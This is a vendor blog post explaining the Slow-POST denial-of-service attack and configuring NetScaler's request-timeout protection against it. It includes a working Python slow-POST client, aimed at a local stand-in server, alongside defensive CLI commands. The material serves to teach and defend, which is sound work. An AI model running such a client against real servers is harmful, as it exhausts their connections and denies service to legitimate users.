The previous blog post covered the Slow-header attack; continuing the series, this one covers the Slow-POST attack. Both belong to a new class of attacks that circumvents the inherent protection offered by networking gear. These attacks use a common HTTP method found in most applications, causing resource consumption on the server. The attack is carefully crafted to affect many networking devices that do HTTP processing. The impact is greater on HTTP proxies, which simulate the HTTP stack while managing the end-to-end request/response flow.

The difference between the two is that a Slow-header attack works with a partial header, whereas a Slow-POST attack sends the full header in the HTTP request but only partial body data. For a web application, waiting to accept all the POST data before processing it is the right thing to do, isn't it? The Slow-POST attack exploits exactly this: it posts data to the server in tiny pieces, keeping the connection alive indefinitely. It takes advantage of the HTTP POST method and simply sends partial data at regular intervals. Let's take a close look at this attack.

The attacker sends an HTTP POST request with a large Content-Length header value. This makes the server or proxy believe that the client is going to send as much data as specified in the header, so the server keeps the connection open to receive Content-Length worth of data. But the attack client sends one byte of POST data at a regular interval, configured by the attacker so that the connection remains alive. Because of this, the client idle timeout is never triggered, and the server keeps the connection open until all the bytes specified in the Content-Length header have been received.
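To make this concrete, here is a minimal sketch of a slow-POST client in Python, suitable only for a lab. The local stand-in server, the path /login, and the 0.1-second drip interval are all illustrative assumptions; a real attack tool drips a byte roughly every 10 seconds to stay just under idle timeouts.

```python
import socket
import threading
import time

received = []

def backend(listener):
    """Stand-in server: accepts one connection and records whatever arrives."""
    conn, _ = listener.accept()
    conn.settimeout(2)              # give up if the client goes silent
    try:
        while True:
            chunk = conn.recv(4096)
            if not chunk:
                break
            received.append(chunk)
    except socket.timeout:
        pass
    finally:
        conn.close()

listener = socket.socket()
listener.bind(("127.0.0.1", 0))
listener.listen(1)
port = listener.getsockname()[1]
t = threading.Thread(target=backend, args=(listener,))
t.start()

# Attack client: complete headers with a huge Content-Length...
client = socket.create_connection(("127.0.0.1", port))
headers = (
    "POST /login HTTP/1.1\r\n"
    "Host: victim.example\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 1000000\r\n"
    "\r\n"
)
client.sendall(headers.encode())

# ...then drip the body one byte at a time, well inside any idle timeout.
for _ in range(3):
    client.sendall(b"a")
    time.sleep(0.1)                 # a real tool would wait ~10 s per byte

client.close()
t.join()
listener.close()
```

The server sees a perfectly valid request start and has no protocol-level reason to hang up: each dripped byte resets its idle timer, yet the promised 1,000,000 bytes never arrive.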

The packet trace below shows how the attack works.


Here packet number 4 shows an HTTP POST request with Content-Length set to 1000000, which makes the server prepare to receive that much data from the client. In packet number 8 the client sends one byte of POST data to the server. Similarly, in packets 10 and 12, ten seconds apart, the client sends one byte of data each time.

In NetScaler, the "show connectiontable" command lists all connections, and "stat lb vserver <vservername>" gives the currently established client connections. The screenshot below was taken with 10 such attack connections running so that the full output fits here.

The protection against this attack is the ability to track these attack patterns and drop such connections so that they do not impact valid traffic flow.

NetScaler has built-in protection against this attack. The request timeout parameter needs to be configured in NetScaler to enable it. Any transaction that does not complete within this interval is dropped, and the client is treated as a bad client. Such drops can be tracked through the http_err_req_timeout counter provided by NetScaler.
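The effect of a request timeout can be sketched in a few lines of Python. This is a simplified model, not NetScaler's implementation: the half-second timeout and the counter dictionary mirroring http_err_req_timeout are illustrative assumptions.

```python
import socket
import threading
import time

REQUEST_TIMEOUT = 0.5                    # illustrative; tune to your traffic
counters = {"http_err_req_timeout": 0}   # modeled after NetScaler's counter

def serve_one(listener):
    """Accept one connection; drop it if the request is not complete in time."""
    conn, _ = listener.accept()
    conn.settimeout(0.05)
    deadline = time.monotonic() + REQUEST_TIMEOUT
    data = b""
    while time.monotonic() < deadline:
        try:
            chunk = conn.recv(4096)
        except socket.timeout:
            continue                     # still waiting; re-check the deadline
        if not chunk:
            break
        data += chunk
        head, sep, body = data.partition(b"\r\n\r\n")
        if sep:
            length = 0
            for line in head.split(b"\r\n"):
                if line.lower().startswith(b"content-length:"):
                    length = int(line.split(b":", 1)[1])
            if len(body) >= length:      # full request arrived in time
                conn.sendall(b"HTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n")
                conn.close()
                return
    counters["http_err_req_timeout"] += 1  # incomplete transaction: drop it
    conn.close()

listener = socket.socket()
listener.bind(("127.0.0.1", 0))
listener.listen(1)
port = listener.getsockname()[1]
t = threading.Thread(target=serve_one, args=(listener,))
t.start()

# A slow-POST client dripping bytes too slowly to finish within the timeout.
client = socket.create_connection(("127.0.0.1", port))
client.sendall(b"POST / HTTP/1.1\r\nContent-Length: 1000000\r\n\r\n")
try:
    for _ in range(3):
        client.sendall(b"a")
        time.sleep(0.3)
except OSError:
    pass                                 # server dropped us mid-drip
t.join()
client.close()
listener.close()
```

Legitimate clients that complete their request within the window are served normally; the slow client above keeps dripping past the deadline, so its connection is dropped and the timeout counter is incremented.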

Once the zombie connections are cleaned up, we can verify through the "show connectiontable" command that the connections are actually gone. We can also check the current client connections through "stat lb vserver <vservername>" as shown below.

NetScaler acts as a good defence for the back-end servers against this attack; customers only need to set the timeout value to one that suits their application traffic. The request timeout parameter can be set in the HTTP profile as shown below:

> set httpprofile nshttp_default_profile -reqTimeout <value>

The above example sets the request timeout parameter in the default HTTP profile, but NetScaler also lets you create your own HTTP profile based on your traffic pattern. You can set the request timeout parameter in a custom profile and bind it to the vserver under attack as shown below:

> add httpprofile <profile name> -reqTimeout <value>

> set lb vserver <vservername> -httpProfileName <httpprofilename>

Enjoy the built-in NetScaler protection mechanisms.